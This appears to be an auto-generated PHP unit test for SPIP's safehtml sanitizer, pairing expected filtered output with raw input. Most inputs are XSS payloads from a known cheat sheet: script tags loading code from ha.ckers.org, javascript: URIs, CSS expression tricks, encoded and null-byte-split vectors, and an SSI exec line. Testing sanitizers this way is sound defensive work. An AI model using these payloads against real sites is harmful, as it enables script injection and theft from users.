3 * Test unitaire de la fonction safehtml
4 * du fichier ./inc/texte_mini.php
6 * genere automatiquement par TestBuilder
12 while (!is_dir($remonte."ecrire"))
13 $remonte = "../$remonte";
14 require $remonte.'tests/test.inc';
15 find_in_path("./inc/texte_mini.php",'',true);
17 // chercher la fonction si elle n'existe pas
18 if (!function_exists($f='safehtml')){
19 find_in_path("inc/filtres.php",'',true);
20 $f = chercher_filtre($f);
26 $err = tester_fun($f, essais_safehtml());
28 // si le tableau $err est pas vide ca va pas
30 die ('<dl>' . join('', $err) . '</dl>');
36 function essais_safehtml(){
50 0 => 'Un texte avec des <a href="http://spip.net">liens</a> [Article 1->art1] [spip->https://www.spip.net] https://www.spip.net',
51 1 => 'Un texte avec des <a href="http://spip.net">liens</a> [Article 1->art1] [spip->https://www.spip.net] https://www.spip.net',
55 0 => 'Un texte avec des entités &<>"',
56 1 => 'Un texte avec des entités &<>"',
60 0 => 'Un texte avec des entit&eacute;s echap&eacute; &amp;&lt;&gt;&quot;',
61 1 => 'Un texte avec des entit&eacute;s echap&eacute; &amp;&lt;&gt;&quot;',
65 0 => 'Un texte avec des entités numériques &<>"',
66 1 => 'Un texte avec des entités numériques &<>"',
70 0 => 'Un texte avec des entit&#233;s num&#233;riques echap&#233;es &#38;&#60;&#62;&quot;',
71 1 => 'Un texte avec des entit&#233;s num&#233;riques echap&#233;es &#38;&#60;&#62;&quot;',
75 0 => 'Un texte sans entites &<>"\'',
76 1 => 'Un texte sans entites &<>"\'',
80 0 => '{{{Des raccourcis}}} {italique} {{gras}} <code>du code</code>',
81 1 => '{{{Des raccourcis}}} {italique} {{gras}} <code>du code</code>',
85 0 => 'Un modele https://www.spip.net]>',
86 1 => 'Un modele <modeleinexistant|lien=[->https://www.spip.net]>',
90 0 => 'Un texte avec des retour
91 a la ligne et meme des
94 1 => 'Un texte avec des retour
95 a la ligne et meme des
101 0 => '\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//-->">\'><code class="echappe-js"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>=&{}',
102 1 => '\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}',
106 0 => '\'\';!--"<xss>=&{()}</xss>',
107 1 => '\'\';!--"<XSS>=&{()}',
111 0 => '<code class="echappe-js"><SCRIPT>alert(\'XSS\')</SCRIPT></code>',
112 1 => '<SCRIPT>alert(\'XSS\')</SCRIPT>',
116 0 => '<code class="echappe-js"><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code>',
117 1 => '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>',
121 0 => '<code class="echappe-js"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>',
122 1 => '<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>',
126 0 => '<base HREF="javascript:alert(\'XSS\');//">',
127 1 => '<BASE HREF="javascript:alert(\'XSS\');//">',
131 0 => '<code class="echappe-js"><BGSOUND SRC="javascript:alert(\'XSS\');"></code>',
132 1 => '<BGSOUND SRC="javascript:alert(\'XSS\');">',
136 0 => '<code class="echappe-js"><BODY BACKGROUND="javascript:alert(\'XSS\');"></code>',
137 1 => '<BODY BACKGROUND="javascript:alert(\'XSS\');">',
141 0 => '<code class="echappe-js"><BODY ONLOAD=alert(\'XSS\')></code>',
142 1 => '<BODY ONLOAD=alert(\'XSS\')>',
147 1 => '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">',
152 1 => '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">',
157 1 => '<DIV STYLE="width: expression(alert(\'XSS\'));">',
162 1 => '<FRAMESET><FRAME SRC="javascript:alert(\'XSS\');"></FRAMESET>',
166 0 => '<code class="echappe-js"><IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME></code>',
167 1 => '<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>',
171 0 => '<input type="IMAGE" />',
172 1 => '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">',
176 0 => '<code class="echappe-js"><IMG SRC="javascript:alert(\'XSS\');"></code>',
177 1 => '<IMG SRC="javascript:alert(\'XSS\');">',
181 0 => '<code class="echappe-js"><IMG SRC=javascript:alert(\'XSS\')></code>',
182 1 => '<IMG SRC=javascript:alert(\'XSS\')>',
186 0 => '<code class="echappe-js"><IMG DYNSRC="javascript:alert(\'XSS\');"></code>',
187 1 => '<IMG DYNSRC="javascript:alert(\'XSS\');">',
191 0 => '<code class="echappe-js"><IMG LOWSRC="javascript:alert(\'XSS\');"></code>',
192 1 => '<IMG LOWSRC="javascript:alert(\'XSS\');">',
196 0 => '<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" />',
197 1 => '<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">',
201 0 => 'exp/*<xss style="noxss:noxss("*/pression(alert("XSS"))"></xss>',
202 1 => 'exp/*<XSS STYLE=\'no\\xss:noxss("*//*");
203 xss:ex/*XSS*//*/*/pression(alert("XSS"))\'>',
207 0 => '<ul><li>XSS</li></ul>',
208 1 => '<STYLE>li {list-style-image: url("javascript:alert(\'XSS\')");}</STYLE><UL><LI>XSS',
212 0 => '<code class="echappe-js"><IMG SRC=\'vbscript:msgbox("XSS")\'></code>',
213 1 => '<IMG SRC=\'vbscript:msgbox("XSS")\'>',
218 1 => '<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>',
222 0 => '<code class="echappe-js"><IMG SRC="livescript:[code]"></code>',
223 1 => '<IMG SRC="livescript:[code]">',
227 0 => '¼script¾alert(¢XSS¢)¼/script¾',
228 1 => '¼script¾alert(¢XSS¢)¼/script¾',
232 0 => '<code class="echappe-js"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');"></code>',
233 1 => '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">',
237 0 => '<code class="echappe-js"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code>',
238 1 => '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">',
242 0 => '<code class="echappe-js"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');"></code>',
243 1 => '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');">',
248 1 => '<IMG SRC="mocha:[code]">',
253 1 => '<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>',
257 0 => '<code class="echappe-js"><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(\'XSS\')></OBJECT></code>',
258 1 => '<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(\'XSS\')></OBJECT>',
263 1 => '<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>',
268 1 => '<STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>',
273 1 => '<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">',
278 1 => '<XSS STYLE="xss:expression(alert(\'XSS\'))">',
282 0 => '<a class="XSS"></a>',
283 1 => '<STYLE>.XSS{background-image:url("javascript:alert(\'XSS\')");}</STYLE><A CLASS=XSS></A>',
288 1 => '<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>',
293 1 => '<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">',
298 1 => '<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">',
303 1 => '<STYLE>@import\'http://ha.ckers.org/xss.css\';</STYLE>',
308 1 => '<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">',
313 1 => '<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>',
317 0 => '<table></table>',
318 1 => '<TABLE BACKGROUND="javascript:alert(\'XSS\')"></TABLE>',
322 0 => '<table><td></td></table>',
323 1 => '<TABLE><TD BACKGROUND="javascript:alert(\'XSS\')"></TD></TABLE>',
328 <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
332 1 => '<HTML xmlns:xss>
333 <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
334 <xss:xss>XSS</xss:xss>
340 0 => '<span></span>',
341 1 => '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(\'XSS\');">]]>
343 </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>',
350 1 => '<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></XML>
352 <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>',
358 1 => '<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
359 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>',
364 <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
366 <?import namespace="t" implementation="#default#time2">
367 <SCRIPT DEFER>alert(\'XSS\')</SCRIPT>"> ',
369 <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
371 <?import namespace="t" implementation="#default#time2">
372 <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(\'XSS\')</SCRIPT>"> </BODY></HTML>',
377 1 => '<!--[if gte IE 4]>
378 <SCRIPT>alert(\'XSS\');</SCRIPT>
383 0 => '<SCRIPT>alert(\'XSS\')</SCRIPT>">',
384 1 => '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'XSS\')</SCRIPT>">',
389 1 => '<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">',
393 0 => '<code class="echappe-js"><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code>',
394 1 => '<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>',
399 1 => '<!--#exec cmd="/bin/echo \'<SCRIPT SRC\'"--><!--#exec cmd="/bin/echo \'=http://ha.ckers.org/xss.js></SCRIPT>\'"-->',
403 0 => '<? echo(\'alert("XSS")\'); ?>',
404 1 => '<? echo(\'<SCR)\';
405 echo(\'IPT>alert("XSS")</SCRIPT>\'); ?>',
409 0 => '<br size="&{alert(\'XSS\')}" />',
410 1 => '<BR SIZE="&{alert(\'XSS\')}">',
565 0 => '<code class="echappe-js"><IMG SRC=JaVaScRiPt:alert(\'XSS\')></code>',
566 1 => '<IMG SRC=JaVaScRiPt:alert(\'XSS\')>',
570 0 => '<code class="echappe-js"><IMG SRC=javascript:alert(&quot;XSS&quot;)></code>',
571 1 => '<IMG SRC=javascript:alert("XSS")>',
575 0 => '<code class="echappe-js"><IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`></code>',
576 1 => '<IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`>',
580 0 => '<code class="echappe-js"><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code>',
581 1 => '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>',
586 1 => '<IMG SRC=javascript:alert('XSS')>',
591 1 => '<IMG SRC=javascript:alert('XSS')>',
595 0 => '<div style="background-image:00750072006C0028\'006a006100760061007300630072006900700074003a0061006c0065007200740028.10270058.1053005300270029\'0029"></div>',
596 1 => '<DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">',
601 1 => '<IMG SRC=javascript:alert('XSS')>',
606 1 => '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-/SCRIPT+AD4-',
610 0 => '\\";alert(\'XSS\');//',
611 1 => '\\";alert(\'XSS\');//',
615 0 => '<code class="echappe-js"><SCRIPT>alert("XSS");</SCRIPT></code>',
616 1 => '</TITLE><SCRIPT>alert("XSS");</SCRIPT>',
621 1 => '<STYLE>@im\\port\'\\ja\\vasc\\ript:alert("XSS")\';</STYLE>',
625 0 => '<code class="echappe-js"><IMG SRC="jav ascript:alert(\'XSS\');"></code>',
626 1 => '<IMG SRC="jav ascript:alert(\'XSS\');">',
630 0 => '<code class="echappe-js"><IMG SRC="jav&#x09;ascript:alert(\'XSS\');"></code>',
631 1 => '<IMG SRC="jav	ascript:alert(\'XSS\');">',
635 0 => '<code class="echappe-js"><IMG SRC="jav&#x0A;ascript:alert(\'XSS\');"></code>',
636 1 => '<IMG SRC="jav
ascript:alert(\'XSS\');">',
640 0 => '<code class="echappe-js"><IMG SRC="jav&#x0D;ascript:alert(\'XSS\');"></code>',
641 1 => '<IMG SRC="jav
ascript:alert(\'XSS\');">',
646 1 => '<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
\'
X
S
S
\'
)
"
>
',
650 0 => '<code class="echappe-js"><IMG SRC=java' . "\0" . 'script:alert("XSS")></code>',
651 1 => '<IMG SRC=java' . "\0" . 'script:alert("XSS")>',
655 0 => '&alert("XSS")',
656 1 => '&<SCR' . "\0" . 'IPT>alert("XSS")</SCR' . "\0" . 'IPT>',
660 0 => '<code class="echappe-js"><IMG SRC=" &#14; javascript:alert(\'XSS\');"></code>',
661 1 => '<IMG SRC="  javascript:alert(\'XSS\');">',
665 0 => '<code class="echappe-js"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
666 1 => '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
670 0 => '|\\]^`=alert("XSS")>',
671 1 => '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>',
675 0 => '<code class="echappe-js"><SCRIPT SRC=http://ha.ckers.org/xss.js</code>',
676 1 => '<SCRIPT SRC=http://ha.ckers.org/xss.js',
680 0 => '<code class="echappe-js"><SCRIPT SRC=//ha.ckers.org/.j></code>',
681 1 => '<SCRIPT SRC=//ha.ckers.org/.j>',
685 0 => '<code class="echappe-js"><IMG SRC="javascript:alert(\'XSS\')"</code>',
686 1 => '<IMG SRC="javascript:alert(\'XSS\')"',
691 1 => '<IFRAME SRC=http://ha.ckers.org/scriptlet.html <',
695 0 => '<<code class="echappe-js"><SCRIPT>alert("XSS");//<</SCRIPT></code>',
696 1 => '<<SCRIPT>alert("XSS");//<</SCRIPT>',
700 0 => '<img /><code class="echappe-js"><SCRIPT>alert("XSS")</SCRIPT></code>">',
701 1 => '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">',
705 0 => '<code class="echappe-js"><SCRIPT>a=/XSS/<br />
706 alert(a.source)</SCRIPT></code>',
707 1 => '<SCRIPT>a=/XSS/
708 alert(a.source)</SCRIPT>',
712 0 => '<code class="echappe-js"><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
713 1 => '<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
717 0 => '<code class="echappe-js"><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
718 1 => '<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
722 0 => '<code class="echappe-js"><SCRIPT a="blah" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
723 1 => '<SCRIPT a="blah" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
727 0 => '<code class="echappe-js"><SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
728 1 => '<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
732 0 => '<code class="echappe-js"><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
733 1 => '<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
737 0 => '<code class="echappe-js"><SCRIPT>document.write("<SCRI");</SCRIPT></code>PT SRC="http://ha.ckers.org/xss.js">',
738 1 => '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
742 0 => '<code class="echappe-js"><SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>',
743 1 => '<SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
747 0 => '<a href="http://66.102.7.147/">XSS</a>',
748 1 => '<A HREF="http://66.102.7.147/">XSS</A>',
752 0 => '<a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</a>',
753 1 => '<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>',
757 0 => '<a href="http://1113982867/">XSS</a>',
758 1 => '<A HREF="http://1113982867/">XSS</A>',
762 0 => '<a href="http://0x42.0x0000066.0x7.0x93/">XSS</a>',
763 1 => '<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>',
767 0 => '<a href="http://0102.0146.0007.00000223/">XSS</a>',
768 1 => '<A HREF="http://0102.0146.0007.00000223/">XSS</A>',
774 tt p://6	6.000146.0x7.147/">XSS</A>',
778 0 => '<a href="//www.google.com/">XSS</a>',
779 1 => '<A HREF="//www.google.com/">XSS</A>',
783 0 => '<a href="//google">XSS</a>',
784 1 => '<A HREF="//google">XSS</A>',
788 0 => '<a href="http://ha.ckers.org@google">XSS</a>',
789 1 => '<A HREF="http://ha.ckers.org@google">XSS</A>',
793 0 => '<a href="http://google:ha.ckers.org">XSS</a>',
794 1 => '<A HREF="http://google:ha.ckers.org">XSS</A>',
798 0 => '<a href="http://google.com/">XSS</a>',
799 1 => '<A HREF="http://google.com/">XSS</A>',
803 0 => '<a href="http://www.google.com./">XSS</a>',
804 1 => '<A HREF="http://www.google.com./">XSS</A>',
809 1 => '<A HREF="javascript:document.location=\'http://www.google.com/\'">XSS</A>',
813 0 => '<a href="http://www.gohttp://www.google.com/ogle.com/">XSS</a>',
814 1 => '<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>',
818 0 => '<span class="montant" data-montant-nombre="100" data-montant-devise="EUR"></span>',
819 1 => '<span class="montant" data-montant-nombre="100" data-montant-devise="EUR">',